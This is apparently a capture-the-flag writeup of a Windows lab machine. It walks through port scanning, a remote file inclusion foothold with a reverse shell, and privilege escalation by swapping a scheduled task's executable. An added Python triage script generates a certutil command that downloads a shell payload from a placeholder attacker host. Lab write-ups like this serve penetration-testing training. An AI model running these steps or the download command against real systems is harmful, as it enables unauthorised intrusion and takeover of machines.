Difficulty – Intermediate
Platform – Proving Grounds Practice
Operating System – Windows
Focus Areas
- Remote File Inclusion (RFI)
- Reverse Shell Deployment
- Weak File Permission Abuse
- Scheduled Task Exploitation
- Windows Privilege Escalation
In this writeup, we exploit a Remote File Inclusion vulnerability in a web application to achieve remote command execution and deploy a reverse shell. After gaining an initial foothold, we escalate privileges by abusing weak file permissions: an executable that a scheduled task runs under an administrative account is replaced with our own payload, which gives us elevated access the next time the task fires.
Recon & Enumeration
Enumeration plays a significant role in penetration testing: the more thoroughly you enumerate, the easier it is to gain a foothold on the target.
First, we check whether the target is reachable with the ping command:
ping Target_IP

The ping output shows that the target is reachable.
Next we run a port scan with Nmap, a popular port scanner that reports each open port together with service and version details. A quick default scan first, then a full scan of all 65535 ports (-p-):
nmap -sC -sV -O -oA nmap/initial 192.168.234.53
nmap -sC -sV -O -p- -oA nmap/full -T4 192.168.234.53


I discovered these ports are open:
- 21/tcp – FTP service running FileZilla FTP Server 0.9.41 beta
- 135/tcp – MSRPC service running Microsoft Windows RPC
- 139/tcp – NetBIOS Session Service running Microsoft Windows NetBIOS-SSN
- 445/tcp – SMB service (Microsoft-DS) exposed
- 3306/tcp – MySQL/MariaDB database service running MariaDB 10.3.24 or later
- 4443/tcp – HTTP service running Apache httpd 2.4.43 (Win64) with OpenSSL 1.1.1g and PHP 7.4.6 (XAMPP dashboard exposed)
- 5040/tcp – Unknown service exposed (commonly associated with Windows services; requires further enumeration)
- 8080/tcp – HTTP service running Apache httpd 2.4.43 (Win64) with OpenSSL 1.1.1g and PHP 7.4.6 (XAMPP dashboard exposed)
- 49664/tcp – MSRPC service running Microsoft Windows RPC
- 49665/tcp – MSRPC service running Microsoft Windows RPC
- 49666/tcp – MSRPC service running Microsoft Windows RPC
- 49667/tcp – MSRPC service running Microsoft Windows RPC
- 49668/tcp – MSRPC service running Microsoft Windows RPC
- 49669/tcp – MSRPC service running Microsoft Windows RPC
- OS: Microsoft Windows (likely Windows Server 2019 / Windows 10 x64)
Then I opened the IP in a web browser on port 8080 and found the XAMPP dashboard:

I quickly ran a gobuster scan to look for different directories:


Based on the result I found that /site was redirecting to another page:

The page was vulnerable to LFI, and when I checked for RFI it turned out to be vulnerable to that as well:


Exploitation
I used msfvenom to create a reverse shell payload and served it with a Python HTTP server:



A successful initial foothold was obtained:


I found the local.txt flag.
Privilege Escalation
Now it was time to escalate privileges. I found that TFTP.EXE is executed by a scheduled task every 5 minutes.
So I generated a reverse shell executable with msfvenom, uploaded it with certutil.exe, and replaced TFTP.EXE with it:



I started a netcat listener on port 21, and after 5 minutes the scheduled task ran the replaced TFTP.EXE and an administrative shell was obtained:


The above image shows the proof.txt file.
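The general check behind this step is: which scheduled tasks run as SYSTEM or an administrator, and which of their binaries (or the directories holding them) can the current low-privileged user write? The script below is an added example, not code from the original writeup. It parses the CSV produced by `schtasks /query /fo CSV /v` on the target, extracts the executable from the "Task To Run" column (quoted or unquoted, with spaces in the path), keeps only privileged tasks, and tests writability. The embedded sample CSV is constructed and trimmed to the relevant columns; the task name and the path C:\Program Files\TFTP\TFTP.EXE in it are assumptions, since the writeup does not give the real path.

```python
# Added example, not part of the original writeup: triage `schtasks` output for
# privilege escalation via a writable task binary, the pattern behind the
# TFTP.EXE replacement above. On the target run
#   schtasks /query /fo CSV /v > tasks.csv
# and feed that file in. The sample CSV below is constructed and trimmed to the
# relevant columns; the TFTP task name and path are assumptions.
import csv
import io
import ntpath
import os
import re
import sys
from typing import Callable, Dict, List

SAMPLE_SCHTASKS_CSV = r'''"TaskName","Task To Run","Run As User","Schedule Type","Repeat: Every"
"\TFTP Sync","C:\Program Files\TFTP\TFTP.EXE","SYSTEM","One Time Only, Minute","0:05:00"
"\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o","SYSTEM","Weekly","N/A"
"\UserBackup","C:\Users\bob\backup.bat","bob","Daily","N/A"
'''

PRIVILEGED_HINTS = ("SYSTEM", "ADMIN")  # matches SYSTEM, Administrator, Administrators


def binary_path(task_to_run: str) -> str:
    """Extract the executable from the 'Task To Run' column (quoted or not)."""
    s = re.sub(r"%(\w+)%", lambda m: os.environ.get(m.group(1), m.group(0)),
               task_to_run.strip())
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    # Unquoted: stop at the first token ending in an executable extension so
    # that paths containing spaces survive intact.
    m = re.match(r"(.+?\.(?:exe|bat|cmd|ps1|vbs|dll))(?:\s|$)", s, re.IGNORECASE)
    return m.group(1) if m else (s.split() or [""])[0]


def default_writable(path: str) -> bool:
    """Real check, meaningful only when run on the target as the foothold user."""
    return os.access(path, os.W_OK)


def find_candidates(csv_text: str,
                    is_writable: Callable[[str], bool] = default_writable) -> List[Dict[str, str]]:
    """Return privileged tasks whose binary (or its directory) the caller can write."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        run_as = (row.get("Run As User") or "").upper()
        if not any(h in run_as for h in PRIVILEGED_HINTS):
            continue
        path = binary_path(row.get("Task To Run") or "")
        file_w = is_writable(path)
        dir_w = is_writable(ntpath.dirname(path))  # Windows paths even on a Linux host
        if not (file_w or dir_w):
            continue
        hits.append({
            "task": row.get("TaskName", ""),
            "binary": path,
            "run_as": row.get("Run As User", ""),
            "schedule": f'{row.get("Schedule Type", "")} / every {row.get("Repeat: Every", "")}',
            "why": "file writable" if file_w else "directory writable (rename and replace)",
            # certutil is the transfer tool the writeup used to fetch the payload
            "replace_hint": f'certutil -urlcache -split -f http://ATTACKER_IP/shell.exe "{path}"',
        })
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:  # real schtasks export, real writability check
        text = open(sys.argv[1], encoding="utf-8-sig", errors="replace").read()
        writable = default_writable
    else:                  # offline demo: pretend only TFTP.EXE is writable
        text = SAMPLE_SCHTASKS_CSV
        writable = lambda p: p.lower().endswith("tftp.exe")
    for hit in find_candidates(text, writable):
        for key, value in hit.items():
            print(f"{key:13}: {value}")
        print()
```

On the target, confirm a hit with `icacls` on the reported binary before touching it, back up the original so the task keeps working after the engagement, and keep the listener up for at least one full schedule interval (5 minutes here) before assuming the replacement failed.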
Key Takeaways
- Enumeration should not stop after identifying the obvious attack surface.
- Writable scheduled task components can become powerful privilege escalation vectors.
- Small misconfigurations in automated processes often lead to full compromise.
- Understanding how applications interact with system files is critical during post-exploitation.
- Privilege escalation frequently depends on analyzing what executes with elevated permissions.
- Revisiting enumeration with a different perspective can reveal overlooked attack paths.
If you enjoyed this post, share it with your friends and colleagues!